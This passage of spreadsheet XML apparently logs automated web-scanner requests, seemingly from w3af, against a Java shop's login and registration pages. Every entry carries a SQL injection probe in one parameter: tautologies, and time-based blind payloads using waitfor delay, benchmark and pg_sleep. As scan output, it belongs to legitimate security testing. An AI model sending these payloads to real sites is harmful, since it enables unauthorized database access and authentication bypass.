    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=1');waitfor+delay+'0:0:5'--&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=1'));waitfor+delay+'0:0:5'--&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=1+or+benchmark(2500000,md5(1))&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=39"+or+"39"="39</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=39"+and+"39"="40</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=39'+or+'39'='39</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=39'+and+'39'='40</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=39+or+39=39+</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=39+and+39=40+</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=1;waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=1);waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=1));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=1';waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=1');waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=1'));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=1+or+benchmark(2500000,md5(1))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=1'+or+benchmark(2500000,md5(1))+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=1"+or+benchmark(2500000,md5(1))+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=1+or+pg_sleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=1'+or+pg_sleep(5)+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar&amp;pwd=frame30.&amp;remember=1"+or+pg_sleep(5)+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar"+or+"46"="46&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar"+and+"46"="47&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar'+or+'46'='46&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=entrar'+and+'46'='47&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=1;waitfor+delay+'0:0:5'--&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=1);waitfor+delay+'0:0:5'--&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=1));waitfor+delay+'0:0:5'--&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=1';waitfor+delay+'0:0:5'--&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=1');waitfor+delay+'0:0:5'--&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=1'));waitfor+delay+'0:0:5'--&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=1+or+benchmark(2500000,md5(1))&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=1+or+pg_sleep(5)&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=1'+or+pg_sleep(5)+or+'1'='1&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;modo=1"+or+pg_sleep(5)+or+"1"="1&amp;pwd=frame30.&amp;remember=</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=74"+or+"74"="74&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=74"+and+"74"="75&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=74'+or+'74'='74&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=74'+and+'74'='75&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=d'z'0&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=94'+or+'94'='94&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=94'+and+'94'='95&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=1;waitfor+delay+'0:0:5'--&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=1);waitfor+delay+'0:0:5'--&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=1));waitfor+delay+'0:0:5'--&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=1';waitfor+delay+'0:0:5'--&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=1');waitfor+delay+'0:0:5'--&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=1'));waitfor+delay+'0:0:5'--&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=1+or+benchmark(2500000,md5(1))&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;pwd=frame30.&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=95"+or+"95"="95&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=95"+and+"95"="96&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=95'+or+'95'='95&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=95'+and+'95'='96&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=d'z'0&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=67'+or+'67'='67&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=67'+and+'67'='68&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=1;waitfor+delay+'0:0:5'--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=1);waitfor+delay+'0:0:5'--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=1));waitfor+delay+'0:0:5'--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=1';waitfor+delay+'0:0:5'--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=1');waitfor+delay+'0:0:5'--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=1'));waitfor+delay+'0:0:5'--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=1+or+benchmark(2500000,md5(1))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=entrar"+or+"55"="55</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=entrar"+and+"55"="56</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=entrar'+or+'55'='55</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=entrar'+and+'55'='56</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=1;waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=1);waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=1));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=1';waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=1');waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=1'));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=1+or+benchmark(2500000,md5(1))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=1'+or+benchmark(2500000,md5(1))+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=1"+or+benchmark(2500000,md5(1))+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=1+or+pg_sleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=1'+or+pg_sleep(5)+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=56&amp;pwd=frame30.&amp;modo=1"+or+pg_sleep(5)+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=22"+or+"22"="22&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=22"+and+"22"="23&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=22'+or+'22'='22&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=22'+and+'22'='23&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=22+or+22=22+&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=22+and+22=23+&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=1;waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=1);waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=1));waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=1';waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=1');waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=1'));waitfor+delay+'0:0:5'--&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=1+or+benchmark(2500000,md5(1))&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=1+or+pg_sleep(5)&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=1'+or+pg_sleep(5)+or+'1'='1&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=1"+or+pg_sleep(5)+or+"1"="1&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50"+or+"36"="36&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50"+and+"36"="37&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50'+or+'36'='36&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50'+and+'36'='37&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50+or+36=36+&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50+and+36=37+&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=1;waitfor+delay+'0:0:5'--&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=1);waitfor+delay+'0:0:5'--&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=1));waitfor+delay+'0:0:5'--&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=1';waitfor+delay+'0:0:5'--&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=1');waitfor+delay+'0:0:5'--&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=1'));waitfor+delay+'0:0:5'--&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=1+or+benchmark(2500000,md5(1))&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=1+or+pg_sleep(5)&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=1'+or+pg_sleep(5)+or+'1'='1&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=1"+or+pg_sleep(5)+or+"1"="1&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=29"+or+"29"="29&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=29"+and+"29"="30&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=29'+or+'29'='29&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=29'+and+'29'='30&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=29+or+29=29+&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=29+and+29=30+&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=1;waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=1);waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=1));waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=1';waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=1');waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=1'));waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?cp=56&amp;provincia=50&amp;dni=1+or+benchmark(2500000,md5(1))&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;modo=registro&amp;nombre=john&amp;ntc=56&amp;password=frame30.&amp;email=w3af@email.com&amp;login=56</t>
  </si>
  <si>
